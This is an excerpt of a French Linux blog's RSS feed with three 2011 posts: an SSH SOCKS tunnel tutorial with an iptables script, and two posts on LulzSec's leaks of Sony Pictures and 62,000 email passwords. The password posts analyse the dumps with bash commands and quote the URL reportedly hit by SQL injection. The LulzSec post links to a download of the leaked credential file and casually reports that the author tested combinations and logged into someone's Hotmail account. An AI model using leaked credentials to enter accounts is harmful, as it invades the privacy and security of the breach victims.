<li><a href="#windows">Configuration d'un client Windows</a></li>
<li><a href="#browser">Configuration du navigateur Internet</a></li>
<li><a href="#test">Testez votre adresse <acronym title="Internet Protocol">IP</acronym>, la rapidité de la connexion et résoudre les problèmes de lenteur</a></li>
<li><a href="#secu">La sécurité liée à ce genre de service</a></li>
</ul>
<h3>Fonctionnement<a name="fonctionnement">&nbsp;</a></h3>
<p>Pour mettre en place ce système, il nous faut bien entendu un serveur dédié avec <acronym title="Secure Shell">SSH</acronym>. Si vous êtes la seule personne à l'utiliser, vous n'aurez pas besoin d'une machine très puissante. La plupart des serveurs dédiés bas de gamme devrait faire l'affaire.</p>
<p>Voici un petit schéma qui explique le fonctionnement d'une connexion Internet à travers un tunnel <acronym title="Secure Shell">SSH</acronym> :</p>
<p><a href="/public/images/schemas/ssh/tunnel-ssh.jpg" class="lightview" rel="gallery['4656']" title="Surfe anonyme sur Internet avec un tunnel SSH"><img src="/public/images/schemas/ssh/tunnel-ssh.jpg" alt="Surfe anonyme sur Internet avec  un tunnel SSH" class="aligncenter" width="620" /></a></p>
<p>La méthode reste assez simple, si l'on ne rentre pas dans les détails :</p>
<ol>
<li>On branche le navigateur Internet de son PC en mode proxy sur l'adresse 127.0.0.1:8080</li>
<li>Le trafic est alors acheminé à l'aide d'un tunnel <acronym title="Secure Shell">SSH</acronym> chiffré, vers le serveur</li>
<li>Celui-ci s'occupe ensuite d'aller chercher les informations sur Internet à votre place</li>
<li>Les données reviennent sur la machine cliente par le même chemin</li>
</ol>
<h3>Installation et configuration du serveur<a name="serveur">&nbsp;</a></h3>
<p>Aucune configuration particulière n'est nécessaire sur le serveur dédié. Normalement, le serveur openSSH est installé et activé sur la plupart des distributions Linux ou Unix, et la configuration par défaut suffit.</p>
<p>Si jamais ce n’est pas le cas, ouvrez un terminal et lancez les commandes suivantes pour une distribution à base de <acronym title="Red Hat Package manager">RPM</acronym> par exemple :</p>
<blockquote><p>
yum install sshd<br />
/etc/init.d/sshd start
</p></blockquote>
<h3>Configuration d'un client Linux<a name="linux">&nbsp;</a></h3>
<p>Notre serveur est maintenant opérationnel. Nous allons donc pouvoir  y connecter notre machine cliente sous Linux par le biais d'un tunnel <acronym title="Secure Shell">SSH</acronym>. Pour y arriver, ouvrez un terminal sur votre ordinateur et lancez la commande suivante :</p>
<blockquote><p>
ssh user@serveur -C -N -D 8080
</p></blockquote>
<p>Cette commande va alors ouvrir un tunnel et en même temps une session <acronym title="Secure Shell">SSH</acronym> vers le serveur. Il faudra absolument garder celle-ci ouverte pour que le tunnel ne soit pas fermé.</p>
<p>Voici quelques explications concernant les options utilisées :</p>
<ul>
<li>user@serveur : le compte <acronym title="Secure Shell">SSH</acronym> et l'adresse <acronym title="Internet Protocol">IP</acronym> du serveur</li>
<li>-C : permet de compresser le trafic et utiliser moins de bande passante</li>
<li>-N : ne pas ouvrir de shell</li>
<li>-D 8080 : permet de créer le tunnel <acronym title="Secure Shell">SSH</acronym>. Tout le trafic envoyé sur le port local (8080) sera redirigé dans le tunnel vers le serveur et ensuite vers Internet</li>
</ul>
<h3>Configuration d'un client Windows<a name="windows">&nbsp;</a></h3>
<p>Sous Windows, le protocole <acronym title="Secure Shell">SSH</acronym> n'est pas disponible par défaut. Pour y remédier, on peut utiliser le célèbre logiciel <a href="http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe">Putty</a>. Une fois lancé :</p>
<ul>
<li>Allez dans les menus Connection &rarr; <acronym title="Secure Shell">SSH</acronym> &rarr; Tunnels</li>
<li>Indiquez 8080 dans le champ Source port et chochez les case Dynamic et Auto</li>
<li>Cliquez ensuite sur Add :</li>
<p><img src="/public/images/screenshots/software/putty/tunnel-putty1.jpg" alt="Configuration de Putty" class="aligncenter" width="400" /></p>
<li>Retournez dans le menu Session et indiquez le compte de connexion et l'adresse du serveur dans le champ host : </li>
<p><img src="/public/images/screenshots/software/putty/tunnel-putty2.jpg" alt="Configuration de Putty" class="aligncenter" width="400" /></p>
<li>Pour finir, cliquez sur Open</li>
</ul>
<h3>Configuration du navigateur Internet<a name="browser">&nbsp;</a></h3>
<p>Voici comment configurer votre navigateur en mode proxy socks. Avec Firefox, Allez dans le menu Options &rarr; Avancé &rarr; Réseau &rarr; Paramètres et utilisez la configuration suivante :</p>
<p><img src="/public/images/screenshots/software/firefox/firefox-proxy.png" alt="Configuration de Firefox en mode proxy" class="aligncenter" width="400" /></p>
<p>A la suite de cela, vous devriez pouvoir naviguer sur Internet comme vous le faites normalement.</p>
<p>Une remarque de @niluje en commentaire : il faut faire attention, si quelqu'un sniff le trafic au niveau du navigateur, il ne récupérera certes pas le trafic car il est chiffré mais il pourra voir toutes les requêtes <acronym title="Domain Name Server">DNS</acronym>. Pour que les requêtes <acronym title="Domain Name Server">DNS</acronym> soient aussi socks, il faut saisir l'adresse about:config dans Firefox et changer la valeur network.proxy.socks_remote_dns à true.</p>
<h3>Testez votre adresse <acronym title="Internet Protocol">IP</acronym>, la rapidité de la connexion et résoudre les problèmes de lenteur<a name="test">&nbsp;</a></h3>
<p>Voici quelques commandes bash très pratiques pour tester votre adresse <acronym title="Internet Protocol">IP</acronym> et la rapidité de la connexion en passant par le tunnel. Ces dernières sont à utiliser sur la machine cliente Linux (si vous utilisez Windows, il faudra faire autrement) :</p>
<blockquote><p>
$ curl --socks5 127.0.0.1:8080 www.whatismyip.org<br />
$ curl --socks5 127.0.0.1:8080 -w 'Lookup time:\t%{time_namelookup}\nConnect time:\t%{time_connect}\nTotal time:\t%{time_total}\n' -o /dev/null -s www.tux-planet.fr</p>
<p>Lookup time:	0.000<br />
Connect time:	0.001<br />
Total time:	0.035
</p></blockquote>
<p>Et sans tunnel :</p>
<blockquote><p>
$ curl www.whatismyip.org<br />
$ curl -w 'Lookup time:\t%{time_namelookup}\nConnect time:\t%{time_connect}\nTotal time:\t%{time_total}\n' -o /dev/null -s www.tux-planet.fr</p>
<p>Lookup time:	0.001<br />
Connect time:	0.009<br />
Total time:	0.045
</p></blockquote>
<p>Si l'écart entre une connexion avec et sans tunnel <acronym title="Secure Shell">SSH</acronym> est trop important, la navigation sur Internet sera alors très lente. Si c'est votre cas, pensez à vérifier la configuration <acronym title="Domain Name Server">DNS</acronym> du serveur (fichier /etc/resolv.conf) car c'est souvent la cause n°1 de ce genre de problème. Des commandes de test sont <a href="/tester-le-temps-de-reponse-dun-serveur-dns/">disponibles ici</a>. </p>
<h3>La sécurité liée à ce genre de service<a name="secu">&nbsp;</a></h3>
<p>La meilleure façon de sécuriser ce genre de serveur est d'utiliser un firewall et d'autoriser uniquement les connexions <acronym title="Secure Shell">SSH</acronym> depuis des adresses <acronym title="Internet Protocol">IP</acronym> connues. Voici un exemple de script IPTABLES qui devrait faire l'affaire dans la plupart des cas (pensez à adapter les variables) :</p>
<pre>
#!/bin/bash

# Variables
export IF_RESEAU="eth0"
export MY_IP="88.xxx.xxx.xxx"

# On efface toutes les regles existantes
/sbin/iptables -F

# On supprime d'eventuelles regles personnelles
/sbin/iptables -X 

# Mise en place des regles par defaut (on refuse tout par default)
/sbin/iptables -P INPUT DROP
/sbin/iptables -P FORWARD DROP
/sbin/iptables -P OUTPUT DROP

# On accepte les connexions sur la boucle locale (sur lo == 127.0.0.1)
/sbin/iptables -A INPUT  -i lo -j ACCEPT
/sbin/iptables -A OUTPUT -o lo -j ACCEPT

# On autorise ssh que pour certaines adresses <acronym title="Internet Protocol">IP</acronym>
/sbin/iptables -A INPUT -i $IF_RESEAU -p tcp --dport ssh --source $MY_IP -j ACCEPT

# On interdit le ssh pour les autres
# A mettre apres la liste des machines autorisee au ssh
/sbin/iptables -A INPUT -i $IF_RESEAU -p tcp --dport ssh -j DROP

# On accept le <acronym title="Domain Name Server">DNS</acronym> + <acronym title="HyperText Transfer Protocol">HTTP</acronym> + HTTPS en sortie
/sbin/iptables -A OUTPUT -o $IF_RESEAU -p udp --dport 53    -j ACCEPT
/sbin/iptables -A OUTPUT -o $IF_RESEAU -p tcp --dport http  -j ACCEPT
/sbin/iptables -A OUTPUT -o $IF_RESEAU -p tcp --dport https -j ACCEPT

# On autorise les connexions deja etablies ou relatives a une autre connexion a sortir
/sbin/iptables -A OUTPUT -o $IF_RESEAU --match state --state ESTABLISHED,RELATED -j ACCEPT

# On autorise les connexions deja etablies a entrer
/sbin/iptables -A INPUT -i $IF_RESEAU --match state --state ESTABLISHED,RELATED -j ACCEPT

# On sauvegarde la configuration de iptables
/etc/init.d/iptables save

# On redemarre le service iptable pour prendre en compte la nouvelle configuration
/etc/init.d/iptables restart

# Chargement du module de gestion des connexion state
# (autorisation des connexions deja etablies a passer le firewall)
# Sur distrib ovh, pas possible car noyau monolitique
/sbin/modprobe ip_conntrack
</pre>
<p>Si vous utilisez ce script, désactivez le démarrage automatique d'IPTABLES au boot du serveur, cela vous évitera des problèmes :</p>
<blockquote><p>
chkconfig iptables off<br />
chkconfig ip6tables off
</p></blockquote>
<p>Mais, il est important de garder à l'esprit que si quelqu'un pirate le serveur, il pourra potentiellement capturer l'ensemble de votre trafic en sortie (avec tcpdump par exemple). C'est un peu le revers de la médaille. Il est donc important d'avoir un serveur à jour et de continuer à utiliser vos méthodes traditionnelles de connexions sur les sites sensibles (ex: utilisation de HTTPS).</p><p><br/><hr><a href="http://www.tux-planet.fr/surf-anonyme-sur-internet-avec-un-tunnel-ssh/">Surf anonyme sur Internet avec un tunnel SSH</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/surf-anonyme-sur-internet-avec-un-tunnel-ssh/feed/</wfw:commentRss>
		<slash:comments>40</slash:comments>
		</item>
		<item>
		<title>Lulzsec dévoile 62 000 mots de passe</title>
		<link>http://www.tux-planet.fr/lulzsec-devoile-62-000-mots-de-passe/</link>
		<comments>http://www.tux-planet.fr/lulzsec-devoile-62-000-mots-de-passe/#comments</comments>
		<pubDate>Thu, 16 Jun 2011 15:45:02 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[lulzsec]]></category>
		<category><![CDATA[password]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4647</guid>
		<description><![CDATA[Le groupe de hackers Lulzsec n'a pas fini de faire parler de lui en ce moment. Après avoir attaqué les sites de Sony et de la CIA, voici qu'il met à disposition aujourd’hui, un fichier de 62 000 adresses mail et mots de passe. Un nouveau record, il me semble. Je vais vous épargner une [...]<p><br/><hr><a href="http://www.tux-planet.fr/lulzsec-devoile-62-000-mots-de-passe/">Lulzsec dévoile 62 000 mots de passe</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img src="/public/images/icons/lulzsec.png" alt="Lulzsec" class="aligncenter" /><br />
Le groupe de hackers Lulzsec n'a pas fini de faire parler de lui en ce moment. Après avoir attaqué les sites de <a href="/analyse-rapide-du-pirate-de-sony-pictures-par-lulzsec/">Sony</a> et de la CIA, voici qu'il met à disposition aujourd’hui, un fichier de 62 000 adresses mail et mots de passe. Un nouveau record, il me semble.</p>
<p><span id="more-4647"></span></p>
<p>Je vais vous épargner une énième analyse sur le top 20 des passwords les plus utilisés, de toute façon ce sont toujours les mêmes qui reviennent. Le fichier est <a href="http://www.megaupload.com/?d=QE3FTI2M">disponible ici</a>, regardez quand même si vous ne faites pas partie de la liste, on ne sait jamais.</p>
<p>Voici quelques commandes bash pour la forme, qui permettent de se faire une idée rapide du nombre de mots de passe et de leur répartition en fonction du service de messagerie utilisé :</p>
<blockquote><p>
$ mv "LulzSec Delivers.txt" passwd-lulzsec-60k<br />
$ wc -l passwd-lulzsec-60k<br />
62178 passwd-lulzsec-60k</p>
<p>$ grep -ci "hotmail\|msn\|live" passwd-lulzsec-60k<br />
21169</p>
<p>$ grep -ci yahoo passwd-lulzsec-60k<br />
11497</p>
<p>$ grep -ci "aol\|aim" passwd-lulzsec-60k<br />
4839</p>
<p>$ grep -ci gmail passwd-lulzsec-60k<br />
4901</p>
<p>$ grep -ci "\.mil " passwd-lulzsec-60k<br />
28</p>
<p>$ grep -ci "gov.br" passwd-lulzsec-60k<br />
12
</p></blockquote>
<p>J'ai pris le temps de tester quelques combinaisons, beaucoup ne fonctionnent pas. Cela me fait penser que Gmail, Yahoo et autres ont déjà réagi. Je suis tout de même rentré sur un compte Hotmail, Microsoft est peut-être, une fois encore, en retard .</p>
<p><em>Merci à <a href="http://vincent.sh">Vincent</a>, <a href="http://twitter.com/r00tbsd">Paul</a>, <a href="http://blog.guilou.fr/">Guillaume</a> et <a href="http://twitter.com/vbouchaud">Vianney</a> pour leur participation à cet article.</em></p><p><br/><hr><a href="http://www.tux-planet.fr/lulzsec-devoile-62-000-mots-de-passe/">Lulzsec dévoile 62 000 mots de passe</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/lulzsec-devoile-62-000-mots-de-passe/feed/</wfw:commentRss>
		<slash:comments>12</slash:comments>
		</item>
		<item>
		<title>Analyse rapide du pirate de Sony Pictures par Lulzsec</title>
		<link>http://www.tux-planet.fr/analyse-rapide-du-pirate-de-sony-pictures-par-lulzsec/</link>
		<comments>http://www.tux-planet.fr/analyse-rapide-du-pirate-de-sony-pictures-par-lulzsec/#comments</comments>
		<pubDate>Tue, 07 Jun 2011 18:43:21 +0000</pubDate>
		<dc:creator>pti-seb</dc:creator>
				<category><![CDATA[sécurité]]></category>
		<category><![CDATA[hack]]></category>
		<category><![CDATA[hacking]]></category>
		<category><![CDATA[sony]]></category>

		<guid isPermaLink="false">http://www.tux-planet.fr/?p=4639</guid>
		<description><![CDATA[Vous êtes sans doute au courant des multiples piratages dont a été victime Sony et son service PSN durant ces dernières semaines. L'une des attaques a visé le site SonyPictures.com et a été orchestrée par le groupe de hackers Lulzsec. Ces derniers ont rendu public une partie des comptes et mots de passe dérobés, ce [...]<p><br/><hr><a href="http://www.tux-planet.fr/analyse-rapide-du-pirate-de-sony-pictures-par-lulzsec/">Analyse rapide du pirate de Sony Pictures par Lulzsec</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></description>
			<content:encoded><![CDATA[<p><img src="/public/images/icons/mechant.png" alt="Password Sony" class="aligncenter" /><br />
Vous êtes sans doute au courant des multiples piratages dont a été victime Sony et son service <acronym title="PlayStation Network accounts">PSN</acronym> durant ces dernières semaines. L'une des attaques a visé le site SonyPictures.com et a été orchestrée par le groupe de hackers <a href="http://fr.wikipedia.org/wiki/LulzSec">Lulzsec</a>. Ces derniers ont rendu public une partie des comptes et mots de passe dérobés, ce qui nous permet aujourd'hui de publier une petite analyse rapide sur ce sujet.</p>
<p><span id="more-4639"></span></p>
<p>La publication de ces informations a eu lieu sous la forme d'une archive zip, envoyée sur le réseau Bittorent. Elle fait une taille de 4,66 Mo et après extraction, on trouve la présence de plusieurs fichiers texte. </p>
<p><img src="/public/images/screenshots/sites/sony/sonypictures.png" alt="Analyse rapide du pirate de Sony Pictures par Lulzsec" class="aligncenter" /></p>
<p>L'un d'eux nous indique que le piratage a eu lieu par le biais d'une injection <acronym title="Structured Query Language">SQL</acronym> à cette adresse, mais on n'en sait pas plus :</p>
<pre>http://www.sonypictures.com/homevideo/ghostbusters/photoupload/view.php?id=12838</pre>
<p>Les trois fichiers qui contiennent des mots de passe sont les suivants :</p>
<ul>
<li>Sony_Pictures_International_AUTOTRADER_USERS.txt</li>
<li>Sony_Pictures_International_BEAUTY_USERS.txt</li>
<li>Sony_Pictures_International_DELBOCA_USERS.txt</li>
</ul>
<p>Pour plus de simplicité, on les renomme :</p>
<blockquote><p>
mv Sony_Pictures_International_AUTOTRADER_USERS.txt sony1<br />
mv Sony_Pictures_International_BEAUTY_USERS sony2<br />
mv Sony_Pictures_International_DELBOCA_USERS.txt sony3
</p></blockquote>
<p>Puis, on extrait les logins et passwords à coup de commandes bash :</p>
<blockquote><p>
$ cat sony1 | grep "0000-00-00" | awk -F'|' '{print $10" | "$9}' &gt;&gt; passwd<br />
$ cat sony2 | grep " | " | grep -v "EMAIL" &gt;&gt; passwd<br />
$ cat sony3 | grep " | " | grep -v "EMAIL" &gt;&gt; passwd
</p></blockquote>
<blockquote><p>
$ sort -u passwd &gt; passwd2 &amp;&amp; mv passwd2 passwd<br />
$ wc -l passwd<br />
36343
</p></blockquote>
<p>Nous sommes en présence de 36 343 mots de passe. Un bref coup d’œil au fichier et on se rend compte qu'ils ne sont même pas chiffrés.</p>
<p>On continue afin de savoir quels sont ceux qui sont les plus utilisés :</p>
<blockquote><p>
$ cat passwd | awk -F' | ' '{print $3}' | sort | uniq -c | sort -nr | head -n 20<br />
    108 seinfeld<br />
     96 password<br />
     75 123456<br />
     73 winner<br />
     44 purple<br />
     40 sweeps<br />
     36 contest<br />
     34 princess<br />
     32 maggie<br />
     30 9452<br />
     29 shadow<br />
     29 peanut<br />
     27 ginger<br />
     26 sunshine<br />
     26 buster<br />
     25 cookie<br />
     24 tigger<br />
     24 summer<br />
     24 michael<br />
...
</p></blockquote>
<p>Pas de doute, le comportement des utilisateurs n'a pas évolué depuis le piratage de <a href="/analyse-du-piratage-des-20k-comptes-hotmail-gmail-et-yahoo/">20 000 comptes Gmail, Hotmail et Yahoo</a>. On retrouve toujours les mêmes : password, 123456, princess...</p>
<p>On poursuit avec la longueur des mots de passe :</p>
<blockquote><p>
$ cat passwd | awk -F' | ' '{print $3}' | sort | uniq -c | sort -nr | awk '{print $2}' &gt; long.lst<br />
$ for line in `cat long.lst`; do echo $line | wc -c; done | sort | uniq -c | sort -nr<br />
   8509 - 10 lettres<br />
   6788 - 8 lettres<br />
   5577 - 9 lettres<br />
   3887 - 11 lettres<br />
   2277 - 12 lettres<br />
    866 - 13 lettres<br />
    494 - 7 lettres<br />
    404 - 14 lettres<br />
    234 - 6 lettres<br />
    163 - 15 lettres<br />
     84 - 16 lettres<br />
     33 - 17 lettres<br />
     26 - 18 lettres<br />
...
</p></blockquote>
<p>Là, pas grand chose à dire, les mots de passe sont pour la plupart construits avec 6 lettres et plus. </p>
<p>Les hackers de Lulzsec revendiquent le vol d'1 000 000  de mots de passe au total, les 30 000 disponibles sur la toile actuellement ne seraient qu'un échantillon. Difficile de vérifier cette information aujourd'hui. Si jamais ils publient tout cela un jour, je vous tiendrais au courant.</p>
<p><a href="http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html">Source</a></p><p><br/><hr><a href="http://www.tux-planet.fr/analyse-rapide-du-pirate-de-sony-pictures-par-lulzsec/">Analyse rapide du pirate de Sony Pictures par Lulzsec</a> est un article original provenant de <a href="http://www.tux-planet.fr">Tux-planet</a> - &copy;Copyright - 2005 Toutes reproductions interdites.</p>
]]></content:encoded>
			<wfw:commentRss>http://www.tux-planet.fr/analyse-rapide-du-pirate-de-sony-pictures-par-lulzsec/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>

